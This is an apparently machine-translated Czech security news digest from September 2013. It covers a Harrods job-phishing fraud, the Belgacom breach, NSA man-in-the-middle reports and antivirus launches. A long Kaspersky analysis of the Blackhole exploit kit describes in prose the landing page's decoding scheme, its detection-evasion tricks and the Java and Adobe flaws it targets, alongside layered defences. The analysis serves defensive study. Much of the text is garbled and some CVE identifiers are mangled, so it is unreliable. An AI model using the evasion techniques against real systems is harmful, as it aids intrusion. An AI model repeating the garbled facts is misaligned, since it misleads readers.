Jsme nedávno informoval o jiné biometrické, váš srdeční tep a podle Stephena Cobb , Senior Security výzkumník společnosti ESET , můžeme být na pokraji rozsáhlé nasazení biometrických údajů . Říká Cobb, " Úspěšné zavedení biometrických prvků v segmentu vedoucí výrobku může nevěstí nic dobrého pro spotřebitele přijetí . " Dodává: "Byl jsem fanouškem těchto údajů jako přidanou autentizační faktor od doby, kdy jsem poprvé zkoumal multi- faktoru a 2fa systémy 20 roků před však přijetí ze strany uživatelů je velmi citlivá na výkon , jinými slovy iPhone 5S mohli postoupit biometrii , nebo dát spoustu lidí mimo biometrie " .
Začátkem tohoto roku , UC Berkeley výzkumníci navrhli " mozkových vln " hesla by mohlo být efektivním nástrojem pro uvolnění počítačů a jiných počítačových systémů - s poruchovostí méně než 1%.
" Zjistili jsme, že mozkových signálů , dokonce i ty získané pomocí low-cost non- rušivé EEG senzory v každodenním prostředí , mohou být použity k autentizaci uživatelů s vysokou přesností ," řekl výzkumníci .
" Jiné než EEG snímač , headset je k nerozeznání od běžné Bluetooth headset pro použití s mobilními telefony , hudební přehrávače a jiných počítačových zařízení , " tvrdí vědci .
Po náhlé - hat skenování může být nejbezpečnější auto klíč někdy dělal poprvé objevil na Žijeme zabezpečení.
Vysněnou práci v luxusním obchodě? Ne - jen chytrý 1.500.000dolar phishing podvod
17 září 2013 Phishing | Hacking | Bezpečnost
Šest Nigerijské muži šli před soud dnes v Londýně za údajné phishingu , kde pracovních nabídek v exkluzivní londýnské obchodního domu Harrods byla použita jako " návnada " .
Celkempodvod , zmíněného jako " podvod" Gumtree kvůli místní síti pracovních nabídek slouží k vlečné sítě pro oběti , vsítil 1.500.000 dolary ,tvrdí obžaloba .
Muži šli na zkoušku na centrální londýnské čtvrti Starý dvůr Bailey dnes - obviněn z vyslání stovky falešné nabídky práce pro luxusní obchodní dům , a pak žádat , aby žadatelé stáhnout " přihlášku " z personální agentury , podle zprávy vDaily Mail .
Podvodníci pak nainstalovat trojského koně na počítačích svých obětí a ukradl částky v rozmezí od 400 liber na 4,700 liber . Obchod byl upozorněn, když žadatelé stěžovali, že jejich počítač byl infikován po podání žádosti o zaměstnání . Šest mužů obviněných z šíření malware jsou IT absolventů .
Walton Hornsby , trestní stíhání , řekl: " Je to specificky zaměřené lidi , kteří hledají práci. Bylo rozhodnuto, že někdo žádá o práci je možná zájem spolupracovat a dodržovat veškeré pokyny někoho, kdo se zdá být pozitivně reagovat na jejich uplatňování vyzve je ke stažení aplikace pack.In srpna a začátkem září 2010 číslo inzeráty objevila na reklamních míst Gumtree různých domu Harrods , poměrně atraktivní příspěvek . "
ESET výzkumný pracovník David Harley říká v post diskutovat jak rozpoznat falešné nabídky práce : "V době, kdy se globální ekonomika je v krizi , tam jsou všechny příliš mnoho lidí řešit své vlastní zaměstnání a finanční problémy tím, scammingnezaměstnaní a pracovní podvody jsouzřejmé způsob chytil jejich pozornost. "
Harley nabízí detailní tipy - včetně záchytných bodů , ve znění pracovních nabídek , které mohou prozradit skutečnost, že neexistuje žádná úloha v nabídce vůbec.
Microsoft re-vydání opravy, které byly příčinou smyčce instalace
17.9.2013 Zranitelnosti | Zabezpečení
Minulý týden počet lidí, kteří uvádí, že existují tři místa, která průběžně instalovány. Microsoft znovu vydala tyto opravy po upevnění detekční problém, který byl příčinou problému.
Následující bylo re-vytékal: Bulletin zabezpečení společnosti Microsoft MS13-067 Aktualizace zabezpečení aplikace Microsoft Office SharePoint Server 2007 (KB2760589) Bulletin zabezpečení společnosti Microsoft MS13-072 Aktualizace zabezpečení pro systém Microsoft Office 2007 suites (KB2760411) Aktualizace zabezpečení pro systém Microsoft Office 2010 (KB2767913) Bulletin zabezpečení společnosti Microsoft MS13-073 Aktualizace zabezpečení aplikace Excel 2003 (KB2810048) Aktualizace zabezpečení aplikace Microsoft Office Excel 2007 (KB2760583) Aktualizace zabezpečení aplikace Microsoft Office Excel Viewer 2007 (KB2760590) Aktualizace zabezpečení pro systém Microsoft Office 2007 suites (KB2760588) Bulletin zabezpečení společnosti Microsoft MS13-074 Aktualizace zabezpečení pro systém Microsoft Office 2013 (KB2810009) 64-Bit Edition Aktualizace nesouvisející se zabezpečením: Aktualizace aplikace Microsoft PowerPoint 2010 (KB2553145) Aktualizace aplikace Microsoft PowerPoint Viewer 2010 (KB2553351) Pokud počáteční náplast pracoval tam pro tebe není třeba nic dělat. Pokud váš stroj šel do instalačního smyčky pro patch by měl nyní být stanovena a můžete testovat a nasazovat.
Největší belgický telekomunikační porušena NSA? 16. září 2013. KyberSecurity | Hacking Belgacom, a to především ve vlastnictví státu a největší telekomunikační v Belgii, bylo oznámil , že jeho vnitřní IT systémy byly porušeny a napaden malware "neznámého třetí strany".
"Při důkladném zkoumání stop digitálního vniknutí, jsme objevili neznámý virus v počtu jednotek v našich interních IT systému. Za účelem odstranění tohoto viru efektivně, jsme se rozhodli vyčistit celý systém," oni rozdělili, a dodal, že operace byla dobře připravena a byla provedena efektivně. Udělali určitě zdůraznit, že neexistuje žádný náznak jakéhokoli dopadu na zákazníky a jejich dat a poskytování svých telekomunikačních služeb nebyla ohrožena v žádném bodě. " Virus se pouze byla zjištěna v rámci vnitřního počítačového systému společnosti Belgacom, ne v telekomunikační síti, "řekli, a poté, co všechny instance ní byly odstraněny, byly zaměstnanci společnosti vyzváni ke změně svého hesla. Společnost se podílela že Belgický federální prokurátor vyšetřuje vniknutí, a oni nemají komentoval pravděpodobných útočníků. Belgický premiér Elio Di Rupo nabídl formální prohlášení říká, že cílem není intrusion byla sabotáž ale jejich vybírání ze "strategických informací." Řekl také, že technologie používaná k útoku naznačuje, že jiné zemi by mohl být za ním. "Pokud je tato hypotéza je potvrzena, a to je opravdu kybernetické špionáže, vláda důrazně odsuzuje tuto vniknutí a porušení integrity veřejné společnosti," řekl uvedl a dodal, že pokud se to ukáže být pravda, budou mít "vhodná opatření". Na tiskové konferenci, jak Belgacom generální ředitel Didier Bellens a Jean-Pascal Labille, belgický ministr veřejných podniků a rozvojovou spolupráci, se odmítl vyjádřit k, který cizí zemi může být za útokem a řekl, že nevěděl, jak dlouho TELECOMU systémy byly ohroženy. Podle nizozemského novinky místě NRC a jejich "dobře informovaných zdrojů", kompromis se datuje do roku 2011, a složitost malware naznačuje, že britská a americká inteligence je pravděpodobné, že viníci. "Hackeři jsou zájem o služby společnosti Belgacom International Carrier (BICS), podpora služeb, které přináší provoz mezi telekomunikačními společnostmi. BIC, společného podniku s Swisscom a MTN Jihoafrické telekomunikační společnosti, je globálním hráčem a jedním z největších poskytovatelů služeb v Africe a na Středním východ, "vysvětlil novinářům s tím, že útočníci se podařilo proniknout do infrastruktury v BICS a byli schopni přistupovat k telefonní a datové přenosy ze zemí, jako je Sýrie a Jemenu.
NSA vydával službě Google MITM útoky 16. září 2013. Počítačový útok | KyberSecurity Po všech těch nedávných odhalení o NSA a jejich sledování a šifrování-zmaření aktivit, to by vás překvapí, že agentura nebo její britský protějšek GCHQ také vydával Google, Yahoo a Microsoft při útocích typu man-in-the-Middle zaměřených na zachycení Komunikace s uživateli?
Ryan Gallagher než na břidlicové byl první zprávu o zjevení pro anglicky mluvící veřejnosti kopání do hlášení brazilské televizní show Fantastico, jehož reportéři měli možnost projít souborem dokumentů unikly informátorů NSA Edward Snowdena na Guardian Glenn Greenwald novinář:
Nicméně, v některých případech GCHQ a NSA zřejmě nebere agresivnější a kontroverzní route-na přinejmenším jedna příležitost obcházet potřebu přistupovat přímo společnost Google provedením man-in-the-middle útok na Google vydávat bezpečnostní certifikáty. Jeden dokument vydaný Fantastico, zjevně převzatý z prezentace NSA, která obsahuje také některé GCHQ diapozitivy, popisuje, "jak se to dělá útok" se zřejmě odposlouchávat provozu SSL. Tento dokument ukazuje, s diagramem, jak jedna z agentur, zjeví se naboural do terčem internetového routeru a skrytě přesměrován cílený Google provoz pomocí falešného bezpečnostního certifikátu tak, aby mohl zachytit informace v nešifrované formátu. Dokumenty z GCHQ "sítě vykořisťování" unit přehlídky že pracuje program s názvem "Flying Pig", která byla zahájena v reakci na zvyšující se využívání SSL šifrování e-mailových poskytovatelů, jako je Yahoo, Google a Hotmail. Flying Pig systém vypadá, aby mohla identifikovat informace týkající se použití anonymitu prohlížeče Tor (má možnost dotazovat "Tor událostí"), a umožňuje rovněž vyzvědači shromažďovat informace o konkrétních SSL šifrování certifikátů. GCHQ síť využívání jednotka se může pochlubit v jednom dokumentu, který je schopen shromažďovat provoz nejen z cizí vládě sítě, ale ze strany leteckých společností, energetických společností a finančních organizací, taky.
Ale jak NSA dostat do rukou těchto falešných certifikátů? Známý odborník kryptografie Matthew Green zdůraznil , že NSA mohl snadno dostat svůj podpisový klíč z méně důvěryhodné certifikační autority, s cílem vytvořit a podepsat falešné certifikáty, které budou v MITM útoky. Podle cryptographer Bruce Schneier , jeden z uniklých snímků v prezentaci se zdá naznačovat, že NSA buď popraveni nebo využila nechvalně 2011 DigiNotar porušení , která vyústila ve vydání nepoctivých SSL certifikátů pro velký počet vysoce-profil oblastech, jako je Facebook, Yahoo!, Microsoft, Skype, Twitter, Tor stránkách projektu, Wordpress, Mozilla verzi webu, a také ty, kteří z mnoha zpravodajských agentur z celého světa, včetně CIA, MI6 a Mossad.
Výkonný antimalware představily AVG i Eset
16.09.2013 Zabezpečení | Ochrana Hned dvě firmy představily svá nejnovější řešení pro boj se škodlivými kódy - AVG své antimalwarové systémy pro rok 2014, Eset zase prvek chránící prostředí sociálních sítí.
AVG představila své širší produktové portfolio pro rok 2014, jež zahrnuje celkem šest novinek - mimo jiné bezplatný AntiVirus Free 2014. Ten například obsahuje zcela novou funkci File Shredder pomáhající udržet citlivá data v soukromí.
Plnohodnotný AntiVirus 2014 pak kromě File Shredderu zahrnuje i funkci Data Safe šifrující a uchovávající cenné soubory na virtuálním disku. PC TuneUp 2014, jenž monitoruje a automaticky optimalizuje počítač, zase nabízí funkce pro vyčištění pevného disku a prodloužení životnosti baterie.
PrivacyFix umožňuje kontrolovat, spravovat i přizpůsobovat bezpečnostní nastavení na oblíbených stránkách (Facebook, Google, LinkedIn) z jednoho centrálního kontrolního panelu.
A konečně AntiVirus PRO v3.3 pro Android dovoluje bezpečně stahovat data, aplikace a prohlížet internetové stránky a má i funkci anti-theft.
Eset zase uvolnil k testování novou verzi Social Media Scanneru. Produkt informuje a chrání před hrozbami nejen účty samotného uživatele Twitteru či Facebooku, ale také účty jeho přátel na sociálních sítích. Součástí je Centrum zabezpečení, které zobrazuje aktuální úroveň ochrany osobních údajů na zmíněných sítích a navrhuje změny v nastavení soukromí.
Novinka umožňuje zvolit si mezi jednorázovou kontrolou nebo skenováním kvůli odhalení případných hrozeb. Po vytvoření účtu na webu výrobce může uživatel řídit ochranu svých profilů na sociálních sítích a chránit neomezený počet účtů včetně rodiny a přátel.
Blackhole 15.9.2013 Zdroj : Kaspersky Hacking | Nástroje Exploit Pack. V černé díry. Exploit batohu úvodní stránku. Exploit pro CVE-2012 - 5076. Exploit pro CVE-2012 až 0507. Exploit pro CVE-2013 - 0422. Three-in-one. Ochrana před zneužitím Java. První fáze: blok přesměrování na cílovou stránku. Druhá fáze: detekce modulem souborů antiviru. Třetí fáze: podpis založený na detekci exploitů. Fáze čtyři: proaktivní detekce využije. Pátá fáze: detekce staženého malware (payload). Závěr. Dnes se využívá zranitelnosti v odůvodněných programů je jedním z nejpopulárnějších způsobů infikování počítačů. Podle našich údajů se uživatel stroje nejčastěji napadl pomocí exploitů pro Oracle Java zranitelnosti. Dnešní bezpečnostní řešení, jsou však schopny účinně odolávat drive-by útoky provedené pomocí exploitu balení. V tomto článku budeme diskutovat o tom, jak může být počítač napaden pomocí blackhole exploit kit a příslušné ochranné mechanismy, které mohou být použity.
Exploit Pack. Zpravidla namísto použití jediného exploit, útočníci využívají ready-made sady známé jako exploit balení. To jim pomáhá výrazně zvýšit efektivitu "pronikání", protože každý útok může využít jednu nebo více využije pro softwarové zranitelnosti přítomných na počítači, že budou napadeni.
Zatímco v minulých činů a škodlivými programy stažené s jejich pomocí na počítači oběti byly vytvořeny stejnými lidmi, dnes tento segment na černém trhu pracuje na SaaS (Software as a Service) model. V důsledku dělby práce, každá skupina zločinců se specializuje ve své vlastní oblasti: některé vytvářet a prodávat Exploit Pack, jiné lákají uživatelům využívat počáteční stránky (řídit provoz), ještě jiní psát malware, který je distribuován pomocí drive-by útoky. Dnes, všichni cybercriminal chtějí nakazit běžných strojích, řekněme, varianta Trojan Zeus musí udělat, je koupit ready-made exploitu pack nastavit a získat co nejvíce potenciální oběti jak je to možné navštívit úvodní stránku (také tzv. landing page).
Útočníci používají několik metod k přesměrování uživatele na exploit smečky vstupní stránce. Nejnebezpečnější je pro uživatele hackerské stránky legitimních webových stránek a injekčních skripty nebo iframe prvky do jejich kódu. V takových případech, to je dost pro uživatele k návštěvě známé stránky pro drive-by útok bude zahájen a na exploit balení začít pracovat tajně. Počítačoví zločinci použít také legitimní reklamní systémy, spojovat bannery a oříšky na škodlivé stránky. Další metodou, která je populární mezi zločinci šíří odkazy na odkazované stránky ve spamu.
Infikování uživatelských stroje pomocí exploit balení: přehled diagram
Tam jsou četné Exploit balení na trhu k dispozici: Jaderná Pack, Styx Pack, BlackHole, Sakura a další. I přes různá jména, všechny práce těchto "řešení" stejným způsobem: každý exploit balíček obsahuje řadu hrdinských plus správce panel. Kromě toho, je provoz všech balení lze využít, na základě toho, co je v podstatě stejný algoritmus.
Jeden z nejznámějších Exploit balení na trhu se nazývá BlackHole. Obsahuje zneužití chyby zabezpečení v aplikaci Adobe Reader, Adobe Flash Player a Oracle Java. Pro maximální účinek se využívá zahrnuty v balení neustále měnit. Na začátku roku 2013 jsme se zabývali třemi využije pro Oracle Java z Blackhole balení, takže jsme zvolili BlackHole pro ilustraci provozní principy exploit balení.
V černé díry. Je třeba poznamenat, že všechny údaje o hrdinských činech, obsah startovacích stránek a další specifické informace popisované v tomto článku (zejména názvy metod a tříd a hodnoty konstant), byl platný v době, kdy byl výzkum prováděn. Počítačoví zločinci se stále aktivně rozvíjet Blackhole: často upravit kód jednoho exploitu nebo jiný bránit detekci anti-malware řešení. Například, může se změnit dešifrovací algoritmus použitý jeden z využije. V důsledku toho mohou být některé kódu se liší od hodnoty uvedené v následujících příkladech, ale s nimi související principy provozu zůstávají stejné.
Máme-li vytisknout všechny proměnlivé údaje v malém typu písma.
Exploit batohu úvodní stránku.
Exploit batohu Úvodní stránka slouží k určení vstupních parametrů a rozhodování o exploit Pack je další akce. Vstupní parametry zahrnují verzi operačního systému na počítači uživatele, typ prohlížeče a plugin verze, jazyk systému atd. Zpravidla se využije být použity při útoku na systém, jsou vybírány na základě vstupních parametrů. Je-li software vyžaduje Exploit balení není přítomen na cílovém počítači, útok neuskuteční. Dalším důvodem útoku nemůže dojít, je, aby se zabránilo exploit balení, obsah dostaly do rukou odborníků v anti-malware společnosti nebo jiné výzkumníky. Například adresy počítačoví zločinci "černé listiny" může používat IP výzkumné společnosti (roboti, roboti, proxy servery), blokové exploity od spuštění virtuálních počítačů, atd.
Screenshot níže ukazuje vzorek kódu ze vstupní stránky Blackhole Exploit soupravy.
Screenshot kódu Blackhole Exploit z kitu úvodní stránku
I krátký pohled na screenshotu je dostačující vidět, že je kód JavaScript je popletl a většina informací jsou zakódovány.
Návštěva úvodní stránku bude mít za následek provedení kódu, který byl původně šifrována.
Algoritmus pro dešifrování kódu JavaScript, který byl v provozu v lednu 2013:
naplnění proměnné "z1 - Zn" se zašifrovaným datům, pak tyto proměnné spojovat do jednoho řetězce a dešifrování dat takto: každé dva znaky (znak "-" je ignorován) jsou považovány tvoří 27-ary číslo, které je převeden do desítkové soustavy; přidat "57" na získané hodnoty a podílet se na výsledku od 5; převést výsledné číslo zpět na znak pomocí funkce "fromCharCode". Kód, který provádí tyto operace je označena modrými ovály na obrázku výše. Druhá řada se skládá ze desetinných čísel od 0 do 255, které jsou převedeny na znaky pomocí ASCII tabulky. Oba fragmenty kódu získané přeměnou jsou prováděny pomocí "eval" příkaz (ukáže na screenshotu s červenými šipkami).
Celý algoritmus výše by byly realizovány s několika řádků kódu, ale zločinci používají speciální techniky (označené žlutými ovály na obrázek), aby se detekce složitější:
úmyslně způsobí výjimku s "document.body * = dokumentu" příkaz; kontrolu styl prvního <div> prvku pomocí příkazu "document.getElementsByTagName (" d "+" iv ") [0] === style.left." "", všimněte si, že prázdné <div> prvek se za tímto účelem do dokumentu (v druhém řádku); volání ", pokud (123)", což nedává smysl, protože tento výraz je vždy pravda; rozbíjení názvy funkcí a následně zřetězení částí. Kromě výše popsaných triků, zločinci využívat mnoho menší změny kódu, které mohou být překážkou signatur detekce. Přestože se náš antivirový program, například, obsahuje skript emulátor a jednoduché změny v konstant a operace nebude mít vliv na účinnost detekce, může výše popsané triky dělat věci těžší emulátoru taky.
Po dešifrování, kód se objeví v paměti RAM - budeme odkazovat na to jako "dešifrovaného skriptu". Skládá se ze dvou částí.
První část je modul založený na volném PluginDetect knihovny, který může být použit k určení verze a schopnosti většiny moderních prohlížečů a jejich zásuvné moduly. Počítačoví zločinci používají různé knihovny, ale tento modul je klíčovým prvkem každé exploit balení. BlackHole používá PluginDetect vybrat vhodné využije pro stažení v závislosti na softwaru nainstalovaného na počítači uživatele. Za "odpovídající" se rozumí takové zneužití, které mají nejvyšší šance na úspěšné spuštění a spuštění škodlivého kódu na konkrétním PC.
Druhá část "dešifrovaného skriptu" je kód odpovědné za zpracování výsledků produkované PluginDetect funkcemi a stahování se využije vybrány a jejich vypouštění.
V březnu 2013 BlackHole používá využije pro následující zranitelnosti:
Java verze od 1,7 do 1.7.х.8 - CVE-2012-5.076; Java verze 1.6 nebo nižší než 1,6 až 1.6.х.32 - CVE-2012-0.507; Java verze z 1.7.х.8 do 1.7.х.10 - CVE-2013 až 0422; Adobe Reader verze pod 8 - CVE-2008-2992; Adobe Reader verze 8 nebo 9-9,3 - CVE-2010 až 0188; Adobe Flash verze od 10 do 10.2.158 - CVE-2011 až 0559; Adobe Flash verze od 10.3.181.0 do 10.3.181.23 a pod 10.3.181 - CVE-2011-2.110. Níže diskutujeme zneužití chyby zabezpečení Java.
Exploit pro CVE-2012 - 5076.
Technické detaily Exploit pro CVE-2012 až 0507.
Technické detaily Exploit pro CVE-2013 - 0422.
Technické detaily Three-in-one.
Jak bylo uvedeno výše, jsou tři Java využívá v podstatě založen na stejném mechanismu: získají oprávnění a načíst užitečné zatížení, který stáhne a spustí cílový soubor. Tři využije také k témuž Java soubor třídy. To jasně ukazuje, že tatáž osoba nebo tytéž osoby se za vývojem těchto tří využije. Jediný rozdíl je technika používaná k získání neomezené oprávnění k souboru třídy.
Class soubor můžete stáhnout a spustit soubory, dešifrování pomocí parametrů předaných dešifrovaného skriptu. Aby detekce obtížnější, škodlivý stažený soubor je obvykle šifrována, a proto nezačíná hlavičkou PE. Stažený soubor je obvykle dešifrovat paměť pomocí XOR algoritmu.
Předávání parametrů přes dešifrovaného skriptu je pohodlný způsob, jak rychle se mění odkazů na užitečné zatížení: to vše se má změnit údaje o exploit smečky vstupní stránky, aniž byste museli znovu zkompilovat škodlivý Java applet.
Tři chyby diskutoval nahoře jsou tzv. logické nedostatky. Je nemožné kontrolovat využije pro takové zranitelnosti, které budou tyto automatické nástroje, jako ty, které monitorování integrity paměti nebo vytvoření výjimek. To znamená, že takové hrdinské činy nemohou být detekovány v aplikaci Microsoft DEP nebo ALSR technologie nebo jiné obdobné automatické nástroje. Nicméně, tam jsou technologie, které mohou vyrovnat s tím - příkladem je Kaspersky Lab Automatic Exploit Prevention (AEP).
Ochrana před zneužitím Java. Přes veškerou snahu zločinci, dnešní bezpečnostní řešení účinně blokovat drive-by útoky provedené pomocí exploitu balení. Zpravidla ochrana proti zneužití obsahuje integrovanou sadu technologií, které blokují takové útoky v různých fázích.
Výše, za předpokladu, popis Blackhole exploit kitu operační principy. Nyní si ukážeme, pomocí řešení společnosti Kaspersky Lab jako příklad, jak se ochrana poskytovaná v každé fázi útoku pomocí Java využije z Blackhole. Vzhledem k tomu, i jiným způsobem, lze využít, balení působí, je podobný, který provádí v Blackhole, může ochranná konstrukce se zde hovoří se na ně vztahují, stejně.
Postupné ochranu proti drive-by útok
Níže diskutujeme, které součásti ochrany komunikovat pomocí škodlivého kódu a kdy.
První fáze: blok přesměrování na cílovou stránku.
Útok začíná, jakmile se uživatel dostane ke zneužití batohu vstupní stránku. Je však možné řešení zabezpečení WWW antivirus součást blokovat útok ještě před tím, než začne, tj. předtím, než skript na vstupní stránce je vypuštěn. Tato ochrana ověří součást adresy webové stránky, než je zahájeno. V podstatě je to jednoduchá kontrola dané stránky URL s databází škodlivých odkazů, ale to může blokovat uživatele před návštěvou exploit batohu vstupní stránku, za předpokladu, že jeho adresa je již známo, že patří do nebezpečného zdroje.
Díky tomu je nezbytné, aby dodavatelé antivirových přidat škodlivé odkazy do svých databází, co nejdříve. Škodlivé URL databáze může být umístěn na běžných strojích nebo v oblaku (tj., na vzdáleném serveru). V druhém případě, cloud technologie přispívají k minimalizaci časové prodlevy před bezpečnostní produkt začne blokovat nové škodlivé odkazy. "Doba odezvy" je snížena v tomto případě, protože řešení zabezpečení nainstalována na počítači uživatele dostává informace o nové hrozby, jakmile příslušný záznam je přidán ke škodlivému databáze odkazů, aniž by museli čekat na aktualizace antivirové databáze.
Počítačoví zločinci se na oplátku snaží změnit domén používané hostit využít stránky balení přistání často, aby se zabránilo bezpečnostní software blokování těchto stránek. To v konečném důsledku snižuje ziskovost jejich podnikání.
Druhá fáze: detekce modulem souborů antiviru.
Pokud má uživatel koneckonců dosáhl exploit batohu vstupní stránku, to je místo, kde součástí souboru antivirového modulu - statické detektoru a heuristická analýza - přijde dovnitř skenování exploit batohu vstupní stránku na výskyt škodlivého kódu. Níže budeme analyzovat provozní principy, výhody a nedostatky každého komponentu.
Statická Detektor používá statickou podpisy pro detekci škodlivého kódu. Tyto podpisy jsou spuštěny pouze specifické fragmenty kódu, v podstatě specifické sekvence bajtu. To je hrozba detekční metody, která byla použita v prvních antivirových řešení a jeho výhody jsou dobře známy. Patří mezi ně vysoký výkon a snadné ukládání podpisů. Vše detektor musí udělat, aby se přijít s verdiktem je porovnat kontrolní součet nebo bytového sekvence kódu analyzované příslušných záznamů v databázi antivirového. Podpisy jsou desítky bajtů ve velikosti a snadno nabitý, takže je lze snadno uložit. Nejvýznamnějším nedostatkem statického detektoru je snadnost, s jakou může být podpis "vyhnul". Všechny zločinci musí udělat, aby detektoru zastavit detekční objekt je změnit pouze jeden bajt. Tento nedostatek vede k druhému: velký počet podpisů potřebných k pokrytí velké množství souborů, což znamená, že databáze se rychle zvětšovat. Heuristická analýza také používá databáze, ale pracuje na zcela jiném principu fungování. To je založeno na analýze objekty: shromažďování a inteligentně analýze dat objektu, určení modelů, atd. V případě, že výpočetní statistiky údaje vznikající v důsledku této analýzy odpovídá heuristické podpis, objekt je detekován jako škodlivý. Hlavní výhodou heuristické podpisu je, že umožňuje řešení pro detekci velký počet podobných objektů, za předpokladu, že rozdíly mezi nimi nejsou příliš velké. Nevýhodou je, že ve srovnání se zpracováním statické podpisy, může heuristický analyzátor je pomalejší a vliv na výkon systému. Například, pokud je heuristický podpis není určen efektivní, tj., jestliže to vyžaduje velký počet operací k plnění jeho kontroly, může ovlivnit výkon systému na stroji, na kterém je spuštěn antivirový řešení. Aby nedošlo k objektu z odhalení pomocí statické podpis, zločinci třeba, aby minimální změny kódu objektu (skript spustitelný program nebo soubor). Tento proces může být do jisté míry automatizovat.
Chcete-li se vyhnout heuristické detekce malwaru spisovatel potřebuje provádět výzkum s cílem zjistit, jaký mechanismus se používá k detekci objektu. Když algoritmus byl zcela nebo částečně analyzována, musí být změny, které brání heuristické podpis byl opět spuštěn být ke škodlivému kódu objektu.
Je zřejmé, že "vyhýbání se" heuristický podpis nevyhnutelně trvá déle, než zločinci zabránit detekci pomocí statických podpisy. To znamená, že heuristické podpisy mají delší "životnost". Na druhou stranu, po malware autoři upravili objekt se vyhnout heuristickou detekci, to také zabere nějaký čas dodavatele antivirového softwaru vytvořit jiný podpis.
Jak bylo uvedeno výše, anti-malware řešení využívá různé soubory podpisů skenovat vstupní stránku. Ve svém tahu, tvůrci malwaru upravovat objekty na exploitu batohu úvodní stránce, aby se vyhnul podpis založený na detekci obou typů. I když je dostatečně jednoduše rozbít řetězce až do znaků vyhnout statické podpisy, vyhýbání se heuristiky vyžaduje využití jemnější funkce nabízené JavaScript - netradiční funkce, srovnání, logické výrazy, atd. Příkladem tohoto typu mlžení byl poskytnut v První část článku. To je v této fázi, že malware je často zjištěna, a to zejména v důsledku nadměrného kód zmatek v pojmech, které lze považovat za charakteristický rys škodlivé objekty.
Kromě databází uložených na pevném disku počítače, tam jsou podpisy umístěné v cloudu. Tyto podpisy jsou obvykle velmi jednoduché, ale extrémně krátká nové hrozby doba odezvy (až pět minut od vytváření podpisu na zpřístupnění v cloudu), znamená to, že uživatel stroje jsou velmi dobře chráněné.
Třetí fáze: podpis založený na detekci exploitů.
Je-li bezpečnostní řešení nedokáže rozpoznat úvodní stránku exploit balení, druhý přichází do provozu. Kontroluje, které pluginy jsou nainstalovány (Adobe Flash Player, Adobe Reader, Java Oracle, apod.) a rozhodne o tom, který využívá se stáhnou a spustit. Bezpečnostní řešení prohledá každý exploit být stahovaný stejným způsobem, jako tomu bylo exploit batohu vstupní stránku - pomocí souboru antivirový modul a cloudové podpisy. Útočníci ve svém tahu snaží vyhnout detekci pomocí určitých technik, které jsou podobné těm, které je popsáno výše.
Fáze čtyři: proaktivní detekce využije.
Pokud žádná ze složek odpovědných za reaktivní (signatur) ochrana zjistil něco podezřelého při skenování exploit balení, obsah a exploit zahájila, to je místo, kde Proaktivní ochrana moduly jsou dodávány dovnitř sledovat chování aplikací v systému v reálném čas a identifikovat jakýkoli škodlivou činnost.
Každá aplikace je rozdělena na základě informací poskytnutých heuristické analýzy, data z cloudu a dalších kritérií, jako "důvěryhodné", "Low omezeným", "High Restricted" nebo "nedůvěryhodné". Application Control omezuje vždy uvedena činnost na základě své kategorii. Aplikace v důvěryhodných třídě jsou povoleny všechny druhy činností, které jsou v nízké omezené skupině odepřen přístup k těmto zdrojům, jako uložení hesla, programy ve vysoké omezeným kategorii není dovoleno provádět změny v systémových složkách, atd. Všechny aplikací, které jsou zahájena, a všechny ty, provoz jsou analyzovány modul nazvaný Kontrola aplikací na produkty společnosti Kaspersky Lab. Tato komponenta sleduje provádění programu v systému pomocí low-level háčky.
Kromě výše uvedených, tzv. Behavior Stream Signatures (BSS) popisujících škodlivou činnost se používají k detekci nebezpečné chování aplikací. Tyto podpisy jsou vyvíjeny virovou analýzu a následně v porovnání s chováním aktivních aplikací. To umožňuje proaktivní ochranu odhalit nové škodlivé verze, které nebyly zahrnuty v nedůvěryhodné nebo Vysoké omezení kategorií. Je třeba poznamenat, že tento typ detekce je velmi efektivní, protože je založen na analýze údajů o skutečném použití ", aktuální aktivity spíše než statické nebo heuristické analýzy. To skýtá takové techniky jako kód mlžení a šifrování zcela neúčinné, protože v žádném případě vliv na chování škodlivého programu.
Pro přísnější kontrolou aplikace, aby se zabránilo jejich zranitelnost z vykořisťování, používáme technologii s názvem Automatická Exploit Prevention (AEP). Složka AEP sleduje každý proces, jak je spuštěn v systému. Konkrétně se kontroluje zásobník volání anomálií, kontroluje kód, který vysílá každý proces, atd. Kromě toho, že provádí výběrové kontroly dynamických knihoven načíst do procesů.
To vše brání a škodlivé procesy, od svého zrodu v důsledku využívající zranitelnosti. To je ve skutečnosti poslední linii obrany, které poskytují ochranu před zneužitím v případě, že ostatní součásti ochrany selhaly. Pokud aplikace, jako je například Oracle Java nebo Adobe Reader, chová podezřele jako výsledek vykořisťování, bude zranitelný legitimní žádost zablokován anti-malware řešení, brání exploit z udělání škody.
Protože ochrana v této fázi je založen na programu jednání, zločinci mají se používat důmyslné a pracné techniky se vyhnout proaktivní ochranu.
Pátá fáze: detekce staženého malware (payload).
Pokud exploit se zůstat nepovšimnuto, pokusí se stáhnout užitečné zatížení a spusťte jej v počítači uživatele.
Jak jsme psali výše, nebezpečný soubor je obvykle kódována, aby se detekce obtížnější, což znamená, že nezačíná hlavičkou PE. Stažený soubor je obvykle dešifrovat paměť pomocí XOR algoritmu. Potom soubor je buď spuštěn z paměti (obvykle se jedná o dynamické knihovny), nebo spadl na pevný disk a pak spustit z pevného disku.
Trik stahování zašifrovaného souboru PE umožňuje malware oklamat antivirová řešení, protože takové stažení vypadají jako obyčejné datové proudy. Je však nezbytné, aby exploit spustí dešifrovat spustitelný soubor na počítači uživatele. A anti-malware řešení bude v souvislosti s tímto soubor všech různých technologií pro ochranu zmíněných výše.
Závěr. Exploit Pack jsou integrovaný systém pro útočení napadených počítačů. Počítačoví zločinci věnovat hodně času a úsilí, aby byla zachována účinnost exploit balení a minimalizovat detekci. Ve svém tahu, anti-malware společnosti neustále zlepšovat své bezpečnostní řešení. Anti-malware prodejci mají nyní celou řadu technologií, které mohou blokovat drive-by útoky na všech úrovních, včetně těch, které zneužívání zranitelnosti.
"Kimsuky" Operation: Severokorejský APT?
14.9.2013 Zdroj: Kaspersky Hacking | KyberVálka Po několik měsíců jsme monitorovali probíhající kybernetické špionáže kampaň proti Jižní Koreje think-tanků. Existuje několik důvodů, proč tato kampaň je výjimečný ve svém provedení a logistiky. Všechno to začalo jednoho dne, když jsme se setkali s poněkud naivní špionážní program, který komunikoval jeho "master" prostřednictvím veřejné e-mailového serveru. Tento přístup je spíše vlastní mnoha amatérských virem spisovatelů a tyto útoky škodlivého softwaru jsou většinou ignorovány.
Nicméně, tam bylo pár věcí, které přitahuje naši pozornost:
